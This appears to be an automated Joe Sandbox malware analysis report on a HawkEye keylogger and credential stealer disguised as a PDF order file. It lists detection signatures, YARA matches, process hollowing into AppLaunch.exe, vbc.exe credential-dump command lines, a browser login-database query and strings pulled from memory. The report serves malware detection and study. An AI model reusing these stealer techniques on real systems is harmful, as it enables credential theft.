Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ORDER-NEW....pdf.exe

Overview

General Information

Sample Name:ORDER-NEW....pdf.exe
Analysis ID:557358
MD5:1baec657210438b896934a7a793c204c
SHA1:4729717dab3dd01b2ca591c86a02176386e02356
SHA256:b041030454ea89a3ff2326405d3bf230f53daa9ecd50c3e3882a1ad6c0d2427c
Infos:

Detection

HawkEye MailPassView
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected MailPassView
Multi AV Scanner detection for submitted file
Yara detected HawkEye Keylogger
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected HawkEye Rat
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
.NET source code references suspicious native API functions
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to steal Mail credentials (via file registry)
Machine Learning detection for sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Yara detected WebBrowserPassView password recovery tool
PE file has nameless sections
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to steal Instant Messenger accounts or passwords
Tries to harvest and steal browser information (history, passwords, etc)
PE file contains section with special chars
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Yara detected Credential Stealer
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Enables debug privileges
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Checks if the current process is being debugged
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Launches processes in debugging mode, may be used to hinder debugging
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • ORDER-NEW....pdf.exe (PID: 6860 cmdline: "C:\Users\user\Desktop\ORDER-NEW....pdf.exe" MD5: 1BAEC657210438B896934A7A793C204C)
    • AppLaunch.exe (PID: 7160 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe MD5: 6807F903AC06FF7E1670181378690B22)
      • vbc.exe (PID: 6356 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmpB254.tmp MD5: C63ED21D5706A527419C9FBD730FFB2E)
      • vbc.exe (PID: 4296 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmpB202.tmp MD5: C63ED21D5706A527419C9FBD730FFB2E)
    • WerFault.exe (PID: 6432 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6860 -s 1156 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 4100 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6860 -s 1156 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000000.702441264.0000000000400000.00000040.00000001.sdmpJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
    00000005.00000000.689728198.0000000000402000.00000040.00000001.sdmpMAL_HawkEye_Keylogger_Gen_Dec18Detects HawkEye Keylogger RebornFlorian Roth
    • 0x8793a:$s1: HawkEye Keylogger
    • 0x879a3:$s1: HawkEye Keylogger
    • 0x80d7d:$s2: _ScreenshotLogger
    • 0x80d4a:$s3: _PasswordStealer
    00000005.00000000.689728198.0000000000402000.00000040.00000001.sdmpJoeSecurity_HawkEyeYara detected HawkEye KeyloggerJoe Security
      00000005.00000002.933455184.0000000007E95000.00000004.00000001.sdmpJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
        00000005.00000002.933455184.0000000007E95000.00000004.00000001.sdmpJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
          Click to see the 52 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          18.0.vbc.exe.400000.4.raw.unpackAPT_NK_BabyShark_KimJoingRAT_Apr19_1Detects BabyShark KimJongRATFlorian Roth
          • 0x147b0:$a1: logins.json
          • 0x14710:$s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login
          • 0x14f34:$s4: \mozsqlite3.dll
          • 0x137a4:$s5: SMTP Password
          18.0.vbc.exe.400000.4.raw.unpackJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
            0.0.ORDER-NEW....pdf.exe.4a73c3c.19.raw.unpackMAL_HawkEye_Keylogger_Gen_Dec18Detects HawkEye Keylogger RebornFlorian Roth
            • 0x87b3a:$s1: HawkEye Keylogger
            • 0x87ba3:$s1: HawkEye Keylogger
            • 0x11205a:$s1: HawkEye Keylogger
            • 0x1120c3:$s1: HawkEye Keylogger
            • 0x80f7d:$s2: _ScreenshotLogger
            • 0x10b49d:$s2: _ScreenshotLogger
            • 0x80f4a:$s3: _PasswordStealer
            • 0x10b46a:$s3: _PasswordStealer
            0.0.ORDER-NEW....pdf.exe.4a73c3c.19.raw.unpackSUSP_NET_NAME_ConfuserExDetects ConfuserEx packed fileArnim Rupp
            • 0x8750d:$name: ConfuserEx
            • 0x111a2d:$name: ConfuserEx
            • 0x8621a:$compile: AssemblyTitle
            • 0x11073a:$compile: AssemblyTitle
            0.0.ORDER-NEW....pdf.exe.4a73c3c.19.raw.unpackJoeSecurity_HawkEyeYara detected HawkEye KeyloggerJoe Security
              Click to see the 211 entries

              Sigma Overview

              No Sigma rule has matched

              Jbx Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Multi AV Scanner detection for submitted file
              Source: ORDER-NEW....pdf.exeVirustotal: Detection: 62%Perma Link
              Source: ORDER-NEW....pdf.exeReversingLabs: Detection: 93%
              Antivirus / Scanner detection for submitted sample
              Source: ORDER-NEW....pdf.exeAvira: detected
              Antivirus detection for URL or domain
              Source: https://a.pomf.cat/Avira URL Cloud: Label: phishing
              Machine Learning detection for sample
              Source: ORDER-NEW....pdf.exeJoe Sandbox ML: detected
              Source: 5.0.AppLaunch.exe.400000.0.unpackAvira: Label: TR/Dropper.Gen
              Source: 5.0.AppLaunch.exe.400000.4.unpackAvira: Label: TR/Dropper.Gen
              Source: 5.0.AppLaunch.exe.400000.3.unpackAvira: Label: TR/Dropper.Gen
              Source: 5.2.AppLaunch.exe.400000.0.unpackAvira: Label: TR/Dropper.Gen
              Source: 5.0.AppLaunch.exe.400000.2.unpackAvira: Label: TR/Dropper.Gen
              Source: 5.0.AppLaunch.exe.400000.1.unpackAvira: Label: TR/Dropper.Gen
              Source: ORDER-NEW....pdf.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
              Source: ORDER-NEW....pdf.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
              Source: Binary string: mscorlib.pdbD source: ORDER-NEW....pdf.exe, 00000000.00000000.716149183.00000000082D5000.00000004.00000001.sdmp, ORDER-NEW....pdf.exe, 00000000.00000000.706455152.00000000082D5000.00000004.00000001.sdmp, ORDER-NEW....pdf.exe, 00000000.00000002.740808600.00000000082D5000.00000004.00000001.sdmp
              Source: Binary string: System.pdbd source: WER450B.tmp.dmp.9.dr
              Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: ORDER-NEW....pdf.exe, 00000000.00000000.708566677.0000000000EC7000.00000004.00000020.sdmp, ORDER-NEW....pdf.exe, 00000000.00000000.698387590.0000000000EC7000.00000004.00000020.sdmp
              Source: Binary string: System.Core.ni.pdbRSDSD source: WER450B.tmp.dmp.9.dr
              Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: ORDER-NEW....pdf.exe, 00000000.00000000.716135209.00000000082D2000.00000004.00000001.sdmp, ORDER-NEW....pdf.exe, 00000000.00000002.740801711.00000000082D2000.00000004.00000001.sdmp
              Source: Binary string: System.ni.pdbRSDS source: WER450B.tmp.dmp.9.dr
              Source: Binary string: c:\Projects\VS2005\WebBrowserPassView\Command-Line\WebBrowserPassView.pdb source: AppLaunch.exe, 00000005.00000002.933455184.0000000007E95000.00000004.00000001.sdmp, AppLaunch.exe, 00000005.00000002.933674801.0000000009480000.00000004.00020000.sdmp, AppLaunch.exe, 00000005.00000003.692797770.0000000008705000.00000004.00000001.sdmp, AppLaunch.exe, 00000005.00000002.932528508.0000000006EA1000.00000004.00000001.sdmp, vbc.exe, vbc.exe, 00000008.00000000.702441264.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000008.00000000.702788844.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp
              Source: Binary string: mscorlib.ni.pdbRSDS source: WER450B.tmp.dmp.9.dr
              Source: Binary string: .pdb+ source: ORDER-NEW....pdf.exe, 00000000.00000000.708210872.0000000000CF4000.00000004.00000001.sdmp, ORDER-NEW....pdf.exe, 00000000.00000002.730094342.0000000000CF4000.00000004.00000001.sdmp
              Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb+ source: ORDER-NEW....pdf.exe, 00000000.00000000.716135209.00000000082D2000.00000004.00000001.sdmp, ORDER-NEW....pdf.exe, 00000000.00000002.740801711.00000000082D2000.00000004.00000001.sdmp
              Source: Binary string: C:\Users\user\Desktop\ORDER-NEW....pdf.PDBh source: ORDER-NEW....pdf.exe, 00000000.00000000.708210872.0000000000CF4000.00000004.00000001.sdmp, ORDER-NEW....pdf.exe, 00000000.00000002.730094342.0000000000CF4000.00000004.00000001.sdmp
              Source: Binary string: \??\C:\Windows\mscorlib.pdba source: ORDER-NEW....pdf.exe, 00000000.00000002.730604414.0000000000EC8000.00000004.00000020.sdmp, ORDER-NEW....pdf.exe, 00000000.00000000.708566677.0000000000EC7000.00000004.00000020.sdmp, ORDER-NEW....pdf.exe, 00000000.00000000.698387590.0000000000EC7000.00000004.00000020.sdmp
              Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb* source: ORDER-NEW....pdf.exe, 00000000.00000000.716149183.00000000082D5000.00000004.00000001.sdmp, ORDER-NEW....pdf.exe, 00000000.00000000.706455152.00000000082D5000.00000004.00000001.sdmp, ORDER-NEW....pdf.exe, 00000000.00000002.740808600.00000000082D5000.00000004.00000001.sdmp
              Source: Binary string: System.pdb source: WER450B.tmp.dmp.9.dr
              Source: Binary string: (P3o0C:\Windows\mscorlib.pdb source: ORDER-NEW....pdf.exe, 00000000.00000000.708210872.0000000000CF4000.00000004.00000001.sdmp, ORDER-NEW....pdf.exe, 00000000.00000002.730094342.0000000000CF4000.00000004.00000001.sdmp
              Source: Binary string: Microsoft.VisualBasic.pdb source: WER450B.tmp.dmp.9.dr
              Source: Binary string: System.Core.ni.pdb source: WER450B.tmp.dmp.9.dr
              Source: Binary string: System.Windows.Forms.pdb source: WER450B.tmp.dmp.9.dr
              Source: Binary string: mscorlib.pdb source: ORDER-NEW....pdf.exe, 00000000.00000002.730604414.0000000000EC8000.00000004.00000020.sdmp, ORDER-NEW....pdf.exe, 00000000.00000000.708566677.0000000000EC7000.00000004.00000020.sdmp, ORDER-NEW....pdf.exe, 00000000.00000000.698387590.0000000000EC7000.00000004.00000020.sdmp, WER450B.tmp.dmp.9.dr
              Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: ORDER-NEW....pdf.exe, 00000000.00000000.716149183.00000000082D5000.00000004.00000001.sdmp, ORDER-NEW....pdf.exe, 00000000.00000000.706455152.00000000082D5000.00000004.00000001.sdmp, ORDER-NEW....pdf.exe, 00000000.00000002.740808600.00000000082D5000.00000004.00000001.sdmp
              Source: Binary string: ORDER-NEW....pdf.PDB source: ORDER-NEW....pdf.exe, 00000000.00000000.708210872.0000000000CF4000.00000004.00000001.sdmp, ORDER-NEW....pdf.exe, 00000000.00000002.730094342.0000000000CF4000.00000004.00000001.sdmp
              Source: Binary string: C:\Users\user\Desktop\ORDER-NEW....pdf.PDB source: ORDER-NEW....pdf.exe, 00000000.00000000.708210872.0000000000CF4000.00000004.00000001.sdmp, ORDER-NEW....pdf.exe, 00000000.00000002.730094342.0000000000CF4000.00000004.00000001.sdmp
              Source: Binary string: System.Drawing.pdb source: WER450B.tmp.dmp.9.dr
              Source: Binary string: mscorlib.ni.pdb source: WER450B.tmp.dmp.9.dr
              Source: Binary string: c:\Projects\VS2005\mailpv\Command-Line\mailpv.pdb source: AppLaunch.exe, 00000005.00000002.933455184.0000000007E95000.00000004.00000001.sdmp, AppLaunch.exe, 00000005.00000002.933674801.0000000009480000.00000004.00020000.sdmp, AppLaunch.exe, 00000005.00000002.933041044.0000000006FAE000.00000004.00000001.sdmp, AppLaunch.exe, 00000005.00000003.692797770.0000000008705000.00000004.00000001.sdmp, vbc.exe, vbc.exe, 00000012.00000000.843177172.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000012.00000000.842483097.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp
              Source: Binary string: System.Core.pdb source: WER450B.tmp.dmp.9.dr
              Source: Binary string: \??\C:\Users\user\Desktop\ORDER-NEW....pdf.PDB[ source: ORDER-NEW....pdf.exe, 00000000.00000002.730604414.0000000000EC8000.00000004.00000020.sdmp, ORDER-NEW....pdf.exe, 00000000.00000000.708566677.0000000000EC7000.00000004.00000020.sdmp, ORDER-NEW....pdf.exe, 00000000.00000000.698387590.0000000000EC7000.00000004.00000020.sdmp
              Source: Binary string: System.ni.pdb source: WER450B.tmp.dmp.9.dr
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_0040938F FindFirstFileW,FindNextFileW,wcslen,wcslen,8_2_0040938F
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_00408CAC FindFirstFileW,FindNextFileW,FindClose,8_2_00408CAC
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 18_2_0040702D FindFirstFileA,FindNextFileA,strlen,strlen,18_2_0040702D
              Source: AppLaunch.exe, 00000005.00000002.933455184.0000000007E95000.00000004.00000001.sdmp, AppLaunch.exe, 00000005.00000002.933674801.0000000009480000.00000004.00020000.sdmp, AppLaunch.exe, 00000005.00000003.692797770.0000000008705000.00000004.00000001.sdmp, AppLaunch.exe, 00000005.00000002.932528508.0000000006EA1000.00000004.00000001.sdmp, vbc.exe, 00000008.00000000.702441264.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000008.00000000.702788844.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmpString found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
              Source: AppLaunch.exe, 00000005.00000002.933455184.0000000007E95000.00000004.00000001.sdmp, AppLaunch.exe, 00000005.00000002.933674801.0000000009480000.00000004.00020000.sdmp, AppLaunch.exe, 00000005.00000003.692797770.0000000008705000.00000004.00000001.sdmp, AppLaunch.exe, 00000005.00000002.932528508.0000000006EA1000.00000004.00000001.sdmp, vbc.exe, 00000008.00000000.702441264.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000008.00000000.702788844.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmpString found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
              Source: bhvF129.tmp.8.drString found in binary or memory: MicrosoftEdge_iecompat:www.yahoo.com/beauty|ntpproviders equals www.yahoo.com (Yahoo)
              Source: bhvF129.tmp.8.drString found in binary or memory: MicrosoftEdge_iecompat:www.yahoo.com/food|ntpproviders equals www.yahoo.com (Yahoo)
              Source: bhvF129.tmp.8.drString found in binary or memory: MicrosoftEdge_iecompat:www.yahoo.com/health|ntpproviders equals www.yahoo.com (Yahoo)
              Source: bhvF129.tmp.8.drString found in binary or memory: MicrosoftEdge_iecompat:www.yahoo.com/makers|ntpproviders equals www.yahoo.com (Yahoo)
              Source: bhvF129.tmp.8.drString found in binary or memory: MicrosoftEdge_iecompat:www.yahoo.com/movies|ntpproviders equals www.yahoo.com (Yahoo)
              Source: bhvF129.tmp.8.drString found in binary or memory: MicrosoftEdge_iecompat:www.yahoo.com/music|ntpproviders equals www.yahoo.com (Yahoo)
              Source: bhvF129.tmp.8.drString found in binary or memory: MicrosoftEdge_iecompat:www.yahoo.com/parents|ntpproviders equals www.yahoo.com (Yahoo)
              Source: bhvF129.tmp.8.drString found in binary or memory: MicrosoftEdge_iecompat:www.yahoo.com/politics|ntpproviders equals www.yahoo.com (Yahoo)
              Source: bhvF129.tmp.8.drString found in binary or memory: MicrosoftEdge_iecompat:www.yahoo.com/style|ntpproviders equals www.yahoo.com (Yahoo)
              Source: bhvF129.tmp.8.drString found in binary or memory: MicrosoftEdge_iecompat:www.yahoo.com/tech|ntpproviders equals www.yahoo.com (Yahoo)
              Source: bhvF129.tmp.8.drString found in binary or memory: MicrosoftEdge_iecompat:www.yahoo.com/travel|ntpproviders equals www.yahoo.com (Yahoo)
              Source: bhvF129.tmp.8.drString found in binary or memory: MicrosoftEdge_iecompat:www.yahoo.com/tv|ntpproviders equals www.yahoo.com (Yahoo)
              Source: bhvF129.tmp.8.drString found in binary or memory: MicrosoftEdge_iecompat:www.yahoo.com|ntpproviders equals www.yahoo.com (Yahoo)
              Source: vbc.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: vbc.exe, 00000008.00000003.712462189.00000000022AF000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712859827.00000000022AF000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.712423496.00000000022B7000.00000004.00000001.sdmp, bhvF129.tmp.8.drString found in binary or memory: http://172.217.23.78/
              Source: AppLaunch.exe, 00000005.00000002.932528508.0000000006EA1000.00000004.00000001.sdmpString found in binary or memory: http://bot.whatismyipaddress.com/
              Source: bhvF129.tmp.8.drString found in binary or memory: http://cacerts.digicert.com/DigiCertECCSecureServerCA.crt0
              Source: bhvF129.tmp.8.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
              Source: bhvF129.tmp.8.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2ExtendedValidationServerCA.crt0
              Source: bhvF129.tmp.8.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceServerCA.crt0
              Source: bhvF129.tmp.8.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA.crt0
              Source: bhvF129.tmp.8.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSecureSiteECCCA-1.crt0
              Source: bhvF129.tmp.8.drString found in binary or memory: http://cookies.onetrust.mgr.consensu.org/?name=euconsent&value=&expire=0&isFirstRequest=true
              Source: bhvF129.tmp.8.drString found in binary or memory: http://cookies.onetrust.mgr.consensu.org/onetrust-logo.svg
              Source: bhvF129.tmp.8.drString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
              Source: bhvF129.tmp.8.drString found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
              Source: bhvF129.tmp.8.drString found in binary or memory: http://crl.pki.goog/GTSGIAG3.crl0
              Source: bhvF129.tmp.8.drString found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
              Source: bhvF129.tmp.8.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: bhvF129.tmp.8.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: bhvF129.tmp.8.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
              Source: bhvF129.tmp.8.drString found in binary or memory: http://crl3.digicert.com/DigiCertSecureSiteECCCA-1.crl0
              Source: bhvF129.tmp.8.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
              Source: bhvF129.tmp.8.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
              Source: bhvF129.tmp.8.drString found in binary or memory: http://crl3.digicert.com/sha2-ev-server-g2.crl04
              Source: bhvF129.tmp.8.drString found in binary or memory: http://crl3.digicert.com/sha2-ha-server-g6.crl04
              Source: bhvF129.tmp.8.drString found in binary or memory: http://crl3.digicert.com/ssca-ecc-g1.crl0.
              Source: bhvF129.tmp.8.drString found in binary or memory: http://crl3.digicert.com/ssca-sha2-g6.crl0/
              Source: bhvF129.tmp.8.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: bhvF129.tmp.8.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
              Source: bhvF129.tmp.8.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
              Source: bhvF129.tmp.8.drString found in binary or memory: http://crl4.digicert.com/DigiCertSecureSiteECCCA-1.crl0L
              Source: bhvF129.tmp.8.drString found in binary or memory: http://crl4.digicert.com/sha2-ev-server-g2.crl0K
              Source: bhvF129.tmp.8.drString found in binary or memory: http://crl4.digicert.com/sha2-ha-server-g6.crl0L
              Source: bhvF129.tmp.8.drString found in binary or memory: http://crl4.digicert.com/ssca-ecc-g1.crl0L
              Source: bhvF129.tmp.8.drString found in binary or memory: http://crl4.digicert.com/ssca-sha2-g6.crl0L
              Source: bhvF129.tmp.8.drString found in binary or memory: http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only
              Source: bhvF129.tmp.8.drString found in binary or memory: http://google.com/
              Source: bhvF129.tmp.8.drString found in binary or memory: http://images.outbrainimg.com/transform/v3/eyJpdSI6IiIsIml1ZSI6Imh0dHA6Ly9pbWFnZXMyLnplbWFudGEuY29tL
              Source: bhvF129.tmp.8.drString found in binary or memory: http://images.outbrainimg.com/transform/v3/eyJpdSI6IjAxYWZjY2Q0NWJhMmI1MGJkMWJjMzhmMGFlZWM2MDJmMjc2O
              Source: bhvF129.tmp.8.drString found in binary or memory: http://images.outbrainimg.com/transform/v3/eyJpdSI6IjJkYTFhZDAwNDEyNzQ2M2E3MGUyMWVkZmIxNmUyZjQ2MjBkM
              Source: bhvF129.tmp.8.drString found in binary or memory: http://images.outbrainimg.com/transform/v3/eyJpdSI6IjU5Zjc4ZGRjN2Y0NThlYzE2YmNhY2E0Y2E2YmFkYzgwNTYyZ
              Source: bhvF129.tmp.8.drString found in binary or memory: http://images.outbrainimg.com/transform/v3/eyJpdSI6IjVhZWEwOTA0MmYxYzJjMDRlMmU1NDg1YzZmNjY2NTU5N2E5N
              Source: bhvF129.tmp.8.drString found in binary or memory: http://images.outbrainimg.com/transform/v3/eyJpdSI6Ijc4NDFiMmZlNWMxZGU2M2JkNDdjMGQzZWI3NjIzYjlkNWU5N
              Source: bhvF129.tmp.8.drString found in binary or memory: http://images.outbrainimg.com/transform/v3/eyJpdSI6Ijk4OGQ1ZDgwMWE2ODQ2NDNkM2ZkMmYyMGEwOTgwMWQ3MDE2Z
              Source: bhvF129.tmp.8.drString found in binary or memory: http://images.outbrainimg.com/transform/v3/eyJpdSI6ImRjOWViNGY4OTFjMzQ4NTUyMWQyYWZlZDU1MmZmOWI0NzQyN
              Source: bhvF129.tmp.8.drString found in binary or memory: http://images.outbrainimg.com/transform/v3/eyJpdSI6ImYxODk5OTBhOWZjYjFmZjNjNmMxNDhmYjkzM2M3NzY1Mzk3Z
              Source: bhvF129.tmp.8.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA61Ofl?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhvF129.tmp.8.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA7XCQ3?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhvF129.tmp.8.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AABzUSt?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhvF129.tmp.8.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADsAOZ?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhvF129.tmp.8.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADsZuW?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhvF129.tmp.8.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADuG4N?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
              Source: bhvF129.tmp.8.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADuQtg?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhvF129.tmp.8.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADuTly?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhvF129.tmp.8.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADuTp7?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhvF129.tmp.8.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADuY5J?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhvF129.tmp.8.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADuZko?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
              Source: bhvF129.tmp.8.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADuqZ9?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
              Source: bhvF129.tmp.8.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADv4Ge?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
              Source: bhvF129.tmp.8.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADv842?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhvF129.tmp.8.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvbPR?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhvF129.tmp.8.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvbce?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhvF129.tmp.8.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvhNP?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhvF129.tmp.8.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvoN9?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhvF129.tmp.8.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyXiwM?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhvF129.tmp.8.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyuliQ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhvF129.tmp.8.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzjSw3?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhvF129.tmp.8.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB16g6qc?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhvF129.tmp.8.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17eTok?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhvF129.tmp.8.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB18T33l?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
              Source: bhvF129.tmp.8.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB18qTPD?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhvF129.tmp.8.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19x3nX?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
